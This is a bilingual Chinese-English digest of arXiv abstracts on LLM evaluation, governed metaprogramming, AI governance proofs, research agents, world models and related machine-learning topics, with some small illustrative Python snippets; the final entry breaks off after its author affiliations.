当前评估大型语言模型(LLM)依赖于固定基准,这些基准对所有模型应用相同的测试项,产生天花板和地板效应,掩盖了能力差距。我们认为最具信息量的评估信号位于边界,即在随机采样解码下每个提示的通过概率接近0.5,并提出了动态边界评估(DBE),它主动定位每个模型的边界,并将其置于全局可比的难度尺度上。DBE提供三个产物:(i) 一个校准的题库,涵盖安全性、能力和真实性,其每项难度标签在9个参考LLM上得到验证;(ii) 技能引导的边界搜索(SGBS),一种仅通过API级查询访问即可为目标LLM找到边界项的搜索算法;(iii) 一个评估协议,将新的LLM置于统一的能力尺度上,并在目标超出题库覆盖范围时自适应地扩展评估集。我们在四个类别上实例化DBE,涵盖安全性(有害请求拒绝和过度拒绝)、能力(受限指令遵循)和真实性(多轮谄媚抵抗)。由此产生的评估覆盖更广泛的模型谱系而不饱和,同时与现有数据集兼容。

英文摘要

Evaluating large language models (LLMs) today rests on fixed benchmarks that apply the same set of items to any model, producing ceiling and floor effects that mask capability gaps. We argue that the most informative evaluation signal lies at the boundary, where the per-prompt pass probability is near 0.5 under random-sampling decoding, and propose Dynamic Boundary Evaluation (DBE), which actively locates each model's boundary and places it on a globally comparable difficulty scale. DBE delivers three artifacts: (i) a calibrated item bank covering safety, capability, and truthfulness, with per-item difficulty labels validated across 9 reference LLMs; (ii) Skill-Guided Boundary Search (SGBS), a search algorithm that finds boundary items for a given target LLM using only API-level query access; and (iii) an evaluation protocol that places a new LLM on a unified ability scale and grows the evaluation set adaptively when the target falls outside the bank's coverage. We instantiate DBE on four categories spanning safety (harmful request refusal and over-refusal), capability (constrained instruction following), and truthfulness (multi-turn sycophancy resistance). The resulting evaluation covers a broader model spectrum without saturation while remaining compatible with existing datasets.
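
The notion of a boundary item (pass probability near 0.5 under sampling) can be illustrated with a small filter over repeated pass/fail samples. This is not SGBS: the tolerance, the item names, and the helper functions are all hypothetical, and the pass rate is simply estimated as the fraction of sampled attempts that pass.

```python
def pass_rate(outcomes):
    """Empirical pass probability from a list of 0/1 sampled outcomes."""
    return sum(outcomes) / len(outcomes)


def boundary_items(samples, tol=0.15):
    """Return items whose estimated pass rate lies within tol of 0.5,
    ordered from closest to the boundary to farthest."""
    rates = {item: pass_rate(outcomes) for item, outcomes in samples.items()}
    near = [item for item, p in rates.items() if abs(p - 0.5) <= tol]
    return sorted(near, key=lambda item: abs(rates[item] - 0.5))


# Hypothetical outcomes from eight sampled generations per item.
samples = {
    "easy": [1, 1, 1, 1, 1, 1, 1, 1],
    "hard": [0, 0, 0, 0, 0, 0, 0, 0],
    "edge": [1, 0, 1, 0, 1, 1, 0, 0],
    "near": [1, 1, 1, 0, 1, 0, 0, 1],
}
selected = boundary_items(samples)
```

Items that always pass or always fail say little about where a model's ability lies, which is the ceiling and floor effect the abstract describes.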

2605.05248 2026-05-27 cs.PL cs.AI 版本更新

Governed Metaprogramming for Intelligent Systems: Reclassifying Eval as a Governed Effect

智能系统的受控元编程:将Eval重新分类为受控效应

Alan L. McCann

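Affiliations: Mashin, Inc.

AI summary: AI systems that generate executable code at runtime amplify authority. The paper proposes governed metaprogramming, a language design that treats program representations as first-class values and the transition from form to executable machine as a governed effect, supported by formal proofs and an implementation in the mashinTalk DSL.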

Comments 15 pages. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Update: Abstract typo fixes. Updated license

详情
AI中文摘要

AI系统越来越多地在运行时合成可执行结构:LLM生成程序,智能体构建工作流,自我改进系统修改自身行为。在经典的homoiconic和分阶段语言中,从代码表示到执行的转换是不受限制的。eval是一种语言原语,而不是受控操作。我们认为,在受控智能系统中,这种转换是一种权限放大:它将符号结构转换为可执行权限,必须像任何其他效应一样被中介。我们提出了受控元编程,一种语言设计,其中程序表示(机器形式)是一等值,形式操作是纯计算,而物化(从形式到可执行机器的转换)是一种受控效应,需经过结构检查。治理系统在允许执行之前分析提议程序的能力需求、策略合规性和资源估计。我们形式化了两个判断:纯形式评估(不发出指令)和受控物化(恰好发出一个受控指令)。我们证明了三个性质:形式操作的纯度、无旁路定理和边界保持。我们在mashinTalk中实现了该设计,mashinTalk是一种用于AI工作流的DSL,编译为BEAM字节码,并报告了与454个现有机器检查的Rocq定理的集成。核心贡献是将eval从语言原语重新分类为受控效应。

英文摘要

AI systems increasingly synthesize executable structure at runtime: LLMs generate programs, agents construct workflows, self-improving systems modify their own behavior. In classical homoiconic and staged languages, the transition from code representation to execution is unrestricted. eval is a language primitive, not a governed operation. We argue that in governed intelligent systems, this transition is an authority amplification: it converts symbolic structure into executable authority and must be mediated like any other effect. We present governed metaprogramming, a language design where program representations (machine forms) are first-class values, form manipulation is pure computation, and materialization (the transition from form to executable machine) is a governed effect subject to structural inspection. The governance system analyzes the proposed program's capability requirements, policy compliance, and resource estimates before permitting execution. We formalize two judgments: pure form evaluation (which emits no directives) and governed materialization (which emits exactly one governed directive). We prove three properties: purity of form manipulation, the no-bypass theorem, and boundary preservation. We implement the design in mashinTalk, a DSL for AI workflows compiling to BEAM bytecode, and report on integration with 454 existing machine-checked Rocq theorems. The central contribution is reclassifying eval from a language primitive into a governed effect.
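
The split between pure form manipulation and governed materialization can be mimicked in a few lines of Python. This is a loose analogy under stated assumptions, not mashinTalk: `Form`, `with_op`, `materialize`, and the capability names are hypothetical, and the only governance check shown is a capability comparison.

```python
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Form:
    """An inert program representation: data only, nothing runs yet."""
    op: str
    args: tuple
    capabilities: frozenset  # capabilities the program would need if executed


class Denied(Exception):
    """Raised when governance refuses to materialize a form."""


def with_op(form, new_op):
    # Pure form manipulation: builds a new value, performs no effect.
    return replace(form, op=new_op)


def materialize(form, granted, registry):
    """Governed step: inspect the form before handing back anything executable."""
    missing = form.capabilities - granted
    if missing:
        raise Denied(f"missing capabilities: {sorted(missing)}")
    func = registry[form.op]
    return lambda: func(*form.args)
```

Because `materialize` is the only function that returns something callable, every path from a form to execution passes through the capability check, which is the property the abstract calls no-bypass.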

2509.26619 2026-05-27 cs.CL cs.AI 版本更新

Searching the Internet for Challenging Benchmarks at Scale

在互联网上大规模搜索具有挑战性的基准测试

Wenda Xu, Vilém Zouhar, Parker Riley, Mara Finkelstein, Markus Freitag, Daniel Deutsch

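Affiliations: Google; ETH Zurich

AI summary: Proposes a fully automatic framework that formalizes the search over Internet topics as a multi-armed bandit problem and uses an epsilon-greedy strategy to find the most challenging topics efficiently, building benchmarks without human curation.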

详情
AI中文摘要

许多静态基准测试开始饱和:随着模型快速改进,它们在固定测试集上获得近乎完美的分数,几乎没有剩余空间来暴露模型的真正弱点——即使是专家策划的挑战集在爬山后也会迅速饱和。我们提出一个完全自动化的框架,在互联网上大规模搜索以构建具有挑战性的基准测试,无需人工筛选。关键洞察是将互联网建模为一个广阔的主题空间,并将搜索形式化为多臂老虎机问题,其中每个主题的难度仅通过昂贵的采样和评估查询来揭示。我们的epsilon-greedy策略在仅探索6%的搜索空间的情况下识别出最具挑战性的主题——相比穷举评估成本降低了100倍。我们在机器翻译和知识问答上进行了验证,确认发现的难度在独立指标(GEMBA-SQA和MetricX)、语言和模型上都是稳健的。

英文摘要

Many static benchmarks are beginning to saturate: as models rapidly improve, they achieve near-perfect scores on fixed test sets, leaving little headroom to expose genuine model weaknesses -- and even expert-curated challenge sets quickly saturate after hillclimbing. We present a fully automatic framework that searches the Internet at scale to construct challenging benchmarks without human curation. The key insight is to model the Internet as a vast space of topics and formalize the search as a multi-armed bandit problem, where each topic's difficulty is revealed only through expensive sample-and-evaluate queries. Our epsilon-greedy strategy identifies the most challenging topics while exploring only 6% of the search space -- a 100 times cost reduction over exhaustive evaluation. We validate on machine translation and knowledge question answering, confirming that discovered difficulty is robust across independent metrics (GEMBA-SQA and MetricX), languages, and models.
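
The bandit formulation in this abstract can be sketched with a textbook epsilon-greedy loop over topics. This is a generic version, not the authors' implementation: `evaluate` stands in for the expensive sample-and-evaluate query, its return value is assumed to be a difficulty score where higher means harder, and the default parameters are arbitrary.

```python
import random


def epsilon_greedy(topics, evaluate, budget, epsilon=0.1, seed=0):
    """Spend `budget` evaluations looking for the topic with the highest difficulty.

    topics   : list of topic identifiers (the bandit arms)
    evaluate : callable topic -> difficulty score (hypothetical, expensive in practice)
    Returns (best_topic, estimated_difficulty, pull_counts).
    """
    rng = random.Random(seed)
    counts = {t: 0 for t in topics}
    means = {t: 0.0 for t in topics}
    for _ in range(budget):
        if rng.random() < epsilon:
            topic = rng.choice(topics)          # explore a random topic
        else:
            topic = max(topics, key=means.get)  # exploit the current hardest estimate
        reward = evaluate(topic)
        counts[topic] += 1
        # Incremental update of the running mean difficulty.
        means[topic] += (reward - means[topic]) / counts[topic]
    return max(topics, key=means.get), means, counts
```

With `epsilon=0.0` the loop never explores and stays on whichever topic it tried first, which shows why some exploration is needed before the hardest topics can be found.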

2605.01489 2026-05-27 cs.AI cs.CL 版本更新

SciResearcher: Scaling Deep Research Agents for Frontier Scientific Reasoning

SciResearcher: 面向前沿科学推理的深度研究智能体规模化

Tianshi Zheng, Rui Wang, Xiyun Li, Kelvin Kiu Wai Tam, Newt Nguyen Kim Hue Nam, Wei Fan, Yangqiu Song, Tianqing Fang

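Affiliations: HKUST; CUHK; Tencent AI Lab

AI summary: Proposes SciResearcher, a framework that synthesizes conceptual and computational tasks grounded in academic evidence and trains an agent on them, reaching state-of-the-art performance at its parameter scale on benchmarks such as HLE-Bio/Chem-Gold.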

Comments 23 pages, 6 figures, 15 tables

详情
AI中文摘要

前沿科学推理正迅速成为推动AI智能体在自动化科学发现中的关键基础。深度研究智能体为此挑战提供了有前景的方法。这些模型通过后训练处理信息寻求任务(通常通过知识图谱构建或迭代网页浏览来策划)来发展强大的问题解决能力。然而,这些策略在前沿科学中面临固有局限性,因为领域特定知识分散在稀疏且异构的学术来源中,而问题解决需要远超事实回忆的复杂计算和推理。为弥合这一差距,我们引入了SciResearcher,一个用于前沿科学数据构建的全自动智能体框架。SciResearcher综合了基于学术证据的多样化概念和计算任务,同时激发信息获取、工具集成推理和长程能力。利用策划的数据进行监督微调和智能体强化学习,我们开发了SciResearcher-8B,一个在HLE-Bio/Chem-Gold基准上达到19.46%的智能体基础模型,在其参数规模上建立了新的最先进水平,并超越了多个更大的专有智能体。它在SuperGPQA-Hard-Biology和TRQA-Literature基准上进一步取得了13-15%的绝对提升。总体而言,SciResearcher为前沿科学推理的自动数据构建引入了一种新范式,并为未来的科学智能体提供了一条可扩展的路径。

英文摘要

Frontier scientific reasoning is rapidly emerging as a key foundation for advancing AI agents in automated scientific discovery. Deep research agents offer a promising approach to this challenge. These models develop robust problem-solving capabilities through post-training on information-seeking tasks, which are typically curated via knowledge graph construction or iterative web browsing. However, these strategies face inherent limitations in frontier science, where domain-specific knowledge is scattered across sparse and heterogeneous academic sources, and problem solving requires sophisticated computation and reasoning far beyond factual recall. To bridge this gap, we introduce SciResearcher, a fully automated agentic framework for frontier-science data construction. SciResearcher synthesizes diverse conceptual and computational tasks grounded in academic evidence, while eliciting information acquisition, tool-integrated reasoning, and long-horizon capabilities. Leveraging the curated data for supervised fine-tuning and agentic reinforcement learning, we develop SciResearcher-8B, an agent foundation model that achieves 19.46% on the HLE-Bio/Chem-Gold benchmark, establishing a new state of the art at its parameter scale and surpassing several larger proprietary agents. It further achieves 13-15% absolute gains on SuperGPQA-Hard-Biology and TRQA-Literature benchmarks. Overall, SciResearcher introduces a new paradigm for automated data construction for frontier scientific reasoning and offers a scalable path toward future scientific agents.

2601.21972 2026-05-27 cs.AI cs.DC cs.MA 版本更新

Learning Decentralized LLM Collaboration with Multi-Agent Actor Critic

基于多智能体Actor-Critic的分散式LLM协作学习

Shuo Liu, Tianle Chen, Ryan Amiri, Christopher Amato

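Affiliations: Northeastern University, Boston, MA

AI summary: For optimizing decentralized LLM collaboration, proposes two multi-agent actor-critic methods (CoLLM-CC and CoLLM-DC). Experiments show that on long-horizon or sparse-reward tasks the centralized-critic method outperforms both Monte Carlo methods and the decentralized-critic method.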

详情
AI中文摘要

近期工作探索了通过多智能体强化学习(MARL)优化LLM协作。然而,大多数MARL微调方法依赖于预定义的执行协议,通常需要集中式执行。分散式LLM协作在实践中更具吸引力,因为智能体可以并行运行推理并灵活部署。此外,当前方法使用蒙特卡洛方法进行微调,这存在高方差问题,因此需要更多样本才能有效训练。Actor-Critic方法在MARL中常用于处理这些问题;因此,我们开发了多智能体Actor-Critic(MAAC)方法来优化分散式LLM协作。本文分析了这些MAAC方法何时以及为何有益。我们提出了两种MAAC方法:带有集中式Critic的CoLLM-CC和带有分散式Critic的CoLLM-DC。我们在写作、编码和游戏领域的实验表明,在短时域和密集奖励设置中,蒙特卡洛方法和CoLLM-DC可以达到与CoLLM-CC相当的性能。然而,在长时域或稀疏奖励任务中,它们均不如CoLLM-CC,其中蒙特卡洛方法需要更多样本,而CoLLM-DC难以收敛。

英文摘要

Recent work has explored optimizing LLM collaboration through Multi-Agent Reinforcement Learning (MARL). However, most MARL fine-tuning approaches rely on predefined execution protocols, which often require centralized execution. Decentralized LLM collaboration is more appealing in practice, as agents can run inference in parallel with flexible deployments. Also, current approaches use Monte Carlo methods for fine-tuning, which suffer from high variance and thus require more samples to train effectively. Actor-critic methods are prevalent in MARL for dealing with these issues; thus, we developed Multi-Agent Actor-Critic (MAAC) methods to optimize decentralized LLM collaboration. In this paper, we analyze when and why these MAAC methods are beneficial. We propose 2 MAAC approaches, CoLLM-CC with a Centralized Critic and CoLLM-DC with Decentralized Critics. Our experiments across writing, coding, and game-playing domains show that Monte Carlo methods and CoLLM-DC can achieve performance comparable to CoLLM-CC in short-horizon and dense-reward settings. However, they both underperform CoLLM-CC on long-horizon or sparse-reward tasks, where Monte Carlo methods require substantially more samples and CoLLM-DC struggles to converge.

2605.00412 2026-05-27 cs.AI cs.RO 版本更新

Physically Native World Models: A Hamiltonian Perspective on Generative World Modeling

物理原生世界模型:生成式世界建模的哈密顿视角

Sen Cui, Jingheng Ma

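Affiliations: Tsinghua University

AI summary: Proposes Hamiltonian World Models, which evolve a structured latent phase space under Hamiltonian-inspired dynamics, aiming at physically reliable, action-controllable, and long-horizon stable future prediction for embodied decision making.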

详情
AI中文摘要

世界模型最近重新成为具身智能、机器人、自动驾驶和基于模型的强化学习的核心范式。然而,当前的世界模型研究通常由三条部分分离的路线主导:强调视觉未来合成的2D视频生成模型、强调空间重建的3D场景中心模型,以及强调抽象预测表示的JEPA类潜变量模型。每条路线都取得了重要进展,但它们仍然难以提供物理可靠、动作可控且长期稳定的预测以支持具身决策。在本文中,我们认为世界模型的瓶颈不再仅仅是它们能否生成逼真的未来,而是这些未来是否物理上有意义且对动作有用。我们提出哈密顿世界模型作为世界建模的一个物理基础视角。关键思想是将观测编码到结构化的潜相空间中,通过带有控制、耗散和残差项的哈密顿动力学演化潜状态,将预测轨迹解码为未来观测,并利用生成的轨迹进行规划。我们讨论了哈密顿结构如何提高可解释性、数据效率和长期稳定性,同时也指出了在涉及摩擦、接触、非保守力和可变形物体的真实机器人场景中的实际挑战。

英文摘要

World models have recently re-emerged as a central paradigm for embodied intelligence, robotics, autonomous driving, and model-based reinforcement learning. However, current world model research is often dominated by three partially separated routes: 2D video-generative models that emphasize visual future synthesis, 3D scene-centric models that emphasize spatial reconstruction, and JEPA-like latent models that emphasize abstract predictive representations. While each route has made important progress, they still struggle to provide physically reliable, action-controllable, and long-horizon stable predictions for embodied decision making. In this paper, we argue that the bottleneck of world models is no longer only whether they can generate realistic futures, but whether those futures are physically meaningful and useful for action. We propose Hamiltonian World Models as a physically grounded perspective on world modeling. The key idea is to encode observations into a structured latent phase space, evolve the latent state through Hamiltonian-inspired dynamics with control, dissipation, and residual terms, decode the predicted trajectory into future observations, and use the resulting rollouts for planning. We discuss how Hamiltonian structure may improve interpretability, data efficiency, and long-horizon stability, while also noting practical challenges in real-world robotic scenes involving friction, contact, non-conservative forces, and deformable objects.
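
A one-dimensional toy version of "Hamiltonian-inspired dynamics with control and dissipation" helps show why such structure is linked to long-horizon stability. The sketch below assumes a hand-written Hamiltonian H(q, p) = p²/2 + q²/2 and a symplectic Euler integrator; the learned encoder, decoder, and residual term from the abstract are omitted, and all names are hypothetical.

```python
def energy(q, p):
    """Toy Hamiltonian H(q, p) = p^2 / 2 + q^2 / 2 (a unit harmonic oscillator)."""
    return 0.5 * (p * p + q * q)


def step(q, p, dt, gamma=0.0, u=0.0):
    """One symplectic-Euler step with optional dissipation (gamma) and control (u)."""
    dH_dq = q
    # Momentum update: conservative force, then damping, then control input.
    p = p + dt * (-dH_dq - gamma * p + u)
    dH_dp = p
    # Position update uses the already-updated momentum.
    q = q + dt * dH_dp
    return q, p


def rollout(q, p, steps, dt=0.01, gamma=0.0, u=0.0):
    """Evolve the latent state (q, p) for a number of steps."""
    for _ in range(steps):
        q, p = step(q, p, dt, gamma, u)
    return q, p
```

Without damping or control, the energy stays close to its initial value over long rollouts instead of drifting, while a positive `gamma` makes it decay, mirroring friction in a physical scene.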

2604.27292 2026-05-27 cs.AI 版本更新

The Two Boundaries: Why Behavioral AI Governance Fails Structurally

两个边界:为什么行为性AI治理在结构上失败

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 本文提出形式化框架,利用Rice定理证明行为性AI治理存在结构性的不可判定间隙,并定义共延治理作为可测试标准,通过分离计算与效应实现结构治理。

Comments 17 pages, 2 figures. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. v2: corrected cross-reference identifiers for companion papers; updated license

详情
AI中文摘要

每个产生效应的系统都有两个边界:它能做什么(表达能力)和治理覆盖什么(治理)。在几乎所有已部署的AI系统中,这些边界是独立定义的,从而产生三个区域:受治理的能力(唯一有用的区域)、未受治理的能力(风险)以及针对不存在的能力的治理策略(作秀)。三个区域中有两个是失败模式。我们关注效应的治理:AI系统在世界中执行的动作(API调用、数据库写入、工具调用)。这不同于模型输出的治理(内容质量、偏见、公平性),后者在不同层面运作并需要不同的机制。我们提出了一个形式化框架来分析这种结构性差距。Rice定理(1953)证明,对于任何试图行为性地治理效应的图灵完备架构,该差距在一般情况下是不可判定的:没有算法可以决定任意程序的非平凡语义属性,包括属性“该程序的效应符合治理策略”。我们定义了共延治理:一种系统属性,其中表达能力边界等于治理边界。我们证明共延治理需要架构决策(将计算与效应分离),而不是事后添加的治理层。我们表明,在这种分离下的结构治理包含了独立的治理基础设施:治理检查成为执行流水线的一部分,而不是与之并行的第二系统。我们提出共延治理作为任何AI治理系统的可测试标准:要么两个边界可证明相同,要么风险和作秀在结构上不可避免。证明在Coq中机械化(454个定理,36个模块,0个待证)。

英文摘要

Every system that performs effects has two boundaries: what it can do (expressiveness) and what governance covers (governance). In nearly all deployed AI systems, these boundaries are defined independently, creating three regions: governed capabilities (the only useful region), ungoverned capabilities (risk), and governance policies that address non-existent capabilities (theater). Two of the three regions are failure modes. We focus on the governance of effects: actions that AI systems perform in the world (API calls, database writes, tool invocations). This is distinct from the governance of model outputs (content quality, bias, fairness), which operates at a different level and requires different mechanisms. We present a formal framework for analyzing this structural gap. Rice's theorem (1953) proves the gap is undecidable in the general case for any Turing-complete architecture that attempts to govern effects behaviorally: no algorithm can decide non-trivial semantic properties of arbitrary programs, including the property "this program's effects comply with the governance policy." We define coterminous governance: a system property where the expressiveness boundary equals the governance boundary. We show that coterminous governance requires an architectural decision (separating computation from effect) rather than a governance layer added after the fact. We show that structural governance under this separation subsumes separate governance infrastructure: governance checks become part of the execution pipeline rather than a second system running alongside it. We propose coterminous governance as the testable criterion for any AI governance system: either the two boundaries are provably identical, or risk and theater are structurally inevitable. Proofs are mechanized in Coq (454 theorems, 36 modules, 0 admitted).
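The three regions named in this abstract can be sketched as plain set operations. This is only an illustration under a strong assumption: both boundaries are given as finite, explicitly enumerated sets of effect names. That is the situation the paper argues an architecture must create, not something that can be computed for arbitrary programs. The effect names below are hypothetical.

```python
def governance_regions(expressible, governed):
    """Split effects into the three regions described in the abstract."""
    e, g = set(expressible), set(governed)
    return {
        "governed": e & g,  # capabilities that exist and are covered
        "risk": e - g,      # capabilities that exist but are not covered
        "theater": g - e,   # policies for capabilities that do not exist
    }


def is_coterminous(expressible, governed):
    """True when the expressiveness and governance boundaries coincide."""
    return set(expressible) == set(governed)


# Hypothetical effect inventory for an agent runtime.
expressible = {"api_call", "db_write", "tool_invoke"}
governed = {"api_call", "db_write", "send_fax"}
regions = governance_regions(expressible, governed)
```

Here `regions["risk"]` contains `tool_invoke` and `regions["theater"]` contains `send_fax`, so the two boundaries are not coterminous.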

2604.27289 2026-05-27 cs.AI 版本更新

Mechanized Foundations of Structural Governance: Machine-Checked Proofs for Governed Intelligence

结构治理的机械化基础:受治理智能的机器验证证明

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 本文通过Coq机械化证明和纸上证明,建立了认知工作流系统中结构治理的理论基础,包括共归纳安全谓词、治理不变性定理、充分性定理、交替范式、必要性定理,并通过属性测试验证了BEAM运行时与规范的一致性。

Comments 27 pages, 4 figures, 1 table. Code and proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. v2: corrected cross-reference identifiers for companion papers. Updated license

详情
AI中文摘要

我们提出了认知工作流系统结构治理理论中的五个结果。其中三个使用Interaction Trees库和参数化共归纳在Coq 8.19中机械化实现;两个通过显式归约在纸上证明。共归纳安全谓词(gov_safe)是一个共归纳性质,捕获无限程序行为的治理安全性,由布尔权限标志索引,该标志对于未治理的I/O可证明为假,对于治理的解释为真(机械化)。治理不变性定理证明治理在元递归塔上是统一的:第n+1层的治理通过类型的定义性等式归约为第n层的治理(机械化)。充分性定理证明四个原子原语(代码、推理、内存、调用)对于任何离散智能系统在表达上完备,形式化为Kleisli范畴的组合闭包(机械化)。交替范式提供任何机器到交替代码和效果层的规范分解,具有合流重写系统(纸上证明)。必要性定理通过显式归约为Rice定理证明,对于需要语义判断的问题,架构不透明组件(推理原语)在数学上是必要的(纸上证明)。第六个贡献将抽象模型连接到部署的运行时:验证解释器规范在Coq中形式化了BEAM运行时的信任、能力和哈希链逻辑,然后使用基于属性的测试对运行系统进行测试,使用超过70,000个随机生成的指令序列,零分歧。机械化包括约12,000行代码,跨越36个模块,包含454个定理和零个待证明引理。

英文摘要

We present five results in the theory of structural governance for cognitive workflow systems. Three are mechanized in Coq 8.19 using the Interaction Trees library with parameterized coinduction; two are proved on paper with explicit reductions. The Coinductive Safety Predicate (gov_safe) is a coinductive property that captures governance safety for infinite program behaviors, indexed by a boolean permission flag that is provably false for ungoverned I/O and true for governed interpretations (mechanized). The Governance Invariance Theorem establishes that governance is uniform across the meta-recursive tower: governance at level n+1 reduces to governance at level n by definitional equality of the type (mechanized). The Sufficiency Theorem proves that four atomic primitives (code, reason, memory, call) are expressively complete for any discrete intelligent system, formalized as compositional closure of a Kleisli category (mechanized). The Alternating Normal Form provides a canonical decomposition of any machine into alternating code and effect layers, with a confluent rewriting system (paper proof). The Necessity Theorem proves via explicit reduction to Rice's theorem that an architecturally opaque component (the reason primitive) is mathematically necessary for problems requiring semantic judgment (paper proof). A sixth contribution connects the abstract model to the deployed runtime: the Verified Interpreter Specification formalizes the BEAM runtime's trust, capability, and hash chain logic in Coq, then tests the running system against this specification using property-based testing with over 70,000 randomly generated directive sequences and zero disagreements. The mechanization comprises approximately 12,000 lines across 36 modules with 454 theorems and zero admitted lemmas.

2604.22774 2026-05-27 cs.CY cs.AI cs.CV cs.LG 版本更新

When VLMs 'Fix' Students: Identifying and Penalizing Over-Correction in the Evaluation of Multi-line Handwritten Math OCR

当VLM“修正”学生:多行手写数学OCR评估中的过度修正识别与惩罚

Jin Seong, Wencke Liermann, Minho Kim, Jong-hun Shin, Soojong Lim

发表机构 * Electronics and Telecommunications Research Institute(电子通信研究所)

AI总结 针对多行手写数学OCR评估中VLM过度修正问题,提出基于LLM的语义评估指标PINK,有效惩罚过度修正,在FERMAT数据集上优于BLEU。

详情
AI中文摘要

手写数学的准确转录对于教育AI系统至关重要,但当前基准未能正确评估这一能力。大多数先前研究关注单行表达式,并依赖BLEU等词汇指标,无法评估跨多行学生解决方案的语义推理。本文首次系统研究多行手写数学光学字符识别(OCR),揭示了视觉语言模型(VLM)的一个关键失败模式:过度修正。这些模型往往“修正”错误,而非忠实地转录学生作品,从而隐藏了教育评估旨在检测的错误。为解决此问题,我们提出PINK(基于惩罚的INK分数),一种语义评估指标,利用大语言模型(LLM)进行基于评分标准的评分,并明确惩罚过度修正。我们在FERMAT数据集上对15个最先进的VLM进行全面评估,发现与BLEU相比出现显著的排名反转:GPT-4o等模型因激进的过度修正受到严重惩罚,而Gemini 2.5 Flash成为最忠实的转录者。此外,人类专家研究表明,PINK与人类判断的一致性显著更高(55.0%偏好,而BLEU为39.5%),为教育场景中的手写数学OCR提供了更可靠的评估框架。

英文摘要

Accurate transcription of handwritten mathematics is crucial for educational AI systems, yet current benchmarks fail to evaluate this capability properly. Most prior studies focus on single-line expressions and rely on lexical metrics such as BLEU, which fail to assess the semantic reasoning across multi-line student solutions. In this paper, we present the first systematic study of multi-line handwritten math Optical Character Recognition (OCR), revealing a critical failure mode of Vision-Language Models (VLMs): over-correction. Instead of faithfully transcribing a student's work, these models often "fix" errors, thereby hiding the very mistakes an educational assessment aims to detect. To address this, we propose PINK (Penalized INK-based score), a semantic evaluation metric that leverages a Large Language Model (LLM) for rubric-based grading and explicitly penalizes over-correction. Our comprehensive evaluation of 15 state-of-the-art VLMs on the FERMAT dataset reveals substantial ranking reversals compared to BLEU: models like GPT-4o are heavily penalized for aggressive over-correction, whereas Gemini 2.5 Flash emerges as the most faithful transcriber. Furthermore, human expert studies show that PINK aligns significantly better with human judgment (55.0% preference over BLEU's 39.5%), providing a more reliable evaluation framework for handwritten math OCR in educational settings.

2603.13381 2026-05-27 cs.LG cs.AI 版本更新

Beyond Linearity in Attention Projections: The Case for Nonlinear Queries

超越注意力投影中的线性:支持非线性查询的理由

Marko Karbevski

发表机构 * Simplicity Technologies(简化科技)

AI总结 本文提出用非线性残差替换注意力中的查询投影W_Q,通过瓶颈MLP实现,在GPT-3小模型上验证了性能提升。

Comments Accepted at the ICLR 2026 GRaM workshop: https://openreview.net/forum?id=pwdnneFiNZ#discussion

详情
AI中文摘要

最近的代数分析表明,在仅解码器和仅编码器Transformer中,查询投影$W_Q$可以设置为恒等映射而不会显著降低性能。这是因为注意力仅通过乘积$XW_Q, XW_K, XW_V$依赖于$X$,允许基变换被相邻层吸收并通过网络传播。我们将$W_Q \in \mathbb{R}^{d \times d}$替换为非线性残差形式$Q(X) = X + f_θ(X)$,其中$f_θ$是一个瓶颈MLP,具有$d^2 + O(d)$个参数。恒等项将非线性锚定到已知良好的先验。在GPT-3 small风格模型上的实验显示,与基线相比持续改进(验证对数损失降低$2.40\%$,困惑度降低$6.81\%$),轻松优于非嵌入参数多12.5%的模型。这些结果激励在更大规模和跨模态上的进一步研究。

英文摘要

Recent algebraic analysis shows that in decoder-only and encoder-only transformers, the Query projection $W_Q$ may be set to identity without noticeable performance deterioration. This is possible because attention depends on $X$ only through the products $XW_Q, XW_K, XW_V$, allowing basis transformations to be absorbed by adjacent layers and propagated through the network. We replace $W_Q \in \mathbb{R}^{d \times d}$ with a nonlinear residual of the form $Q(X) = X + f_θ(X)$, where $f_θ$ is a bottleneck MLP with $d^2 + O(d)$ parameters. The identity term anchors the nonlinearity to a known-good prior. Experiments on GPT-3 small style models show consistent improvement over the baseline ($2.40\%$ lower validation log-loss, $6.81\%$ lower perplexity), comfortably outperforming a model with 12.5% more non-embedding parameters. These results motivate investigation at larger scales and across modalities.
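A minimal sketch of the residual query $Q(X) = X + f_θ(X)$ may make the parameter count concrete. Several details are assumptions not stated in the abstract: the bottleneck width is taken as $d/2$ (so the two weight matrices hold $d^2$ entries for even $d$), the activation is `tanh`, and the output matrix is zero-initialized so that $Q(X) = X$ before training. The pure-Python loops are for readability only.

```python
import math
import random


def init_params(d, seed=0):
    """Bottleneck MLP d -> d/2 -> d (assumed width; d should be even)."""
    r = d // 2
    rng = random.Random(seed)
    return {
        "W1": [[rng.gauss(0.0, 0.02) for _ in range(r)] for _ in range(d)],
        "b1": [0.0] * r,
        # Zero init (an assumption) makes the block start as the identity map.
        "W2": [[0.0] * d for _ in range(r)],
        "b2": [0.0] * d,
    }


def param_count(params):
    """Weights (d*r + r*d) plus biases (r + d)."""
    d, r = len(params["W1"]), len(params["b1"])
    return d * r + r + r * d + d


def nonlinear_query(X, params):
    """Compute Q(X) = X + f(X) row by row for a list of d-dimensional tokens."""
    W1, b1, W2, b2 = params["W1"], params["b1"], params["W2"], params["b2"]
    d, r = len(W1), len(b1)
    out = []
    for x in X:
        hidden = [
            math.tanh(sum(x[i] * W1[i][k] for i in range(d)) + b1[k])
            for k in range(r)
        ]
        f = [sum(hidden[k] * W2[k][j] for k in range(r)) + b2[j] for j in range(d)]
        out.append([x[j] + f[j] for j in range(d)])
    return out
```

For `d = 8` this gives 64 weights plus 12 biases, matching the $d^2 + O(d)$ budget quoted in the abstract.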

2512.05794 2026-05-27 cs.LG cs.AI q-bio.QM 版本更新

Mechanistic Interpretability of Antibody Language Models Using SAEs

使用 SAE 对抗体语言模型的机制可解释性研究

Rebonto Haque, Oliver M. Turnbull, Anisha Parsan, Nithin Parsan, John J. Yang, Anna L. Beukenhorst, Charlotte M. Deane

发表机构 * Department of Statistics, University of Oxford, UK(英国牛津大学统计系) Reticular, San Francisco, USA(美国旧金山Reticular公司) EECS, MIT, Cambridge MA, USA(美国麻省理工学院电子工程与计算机科学系) Leyden Laboratories BV, Leiden, The Netherlands(荷兰莱顿实验室)

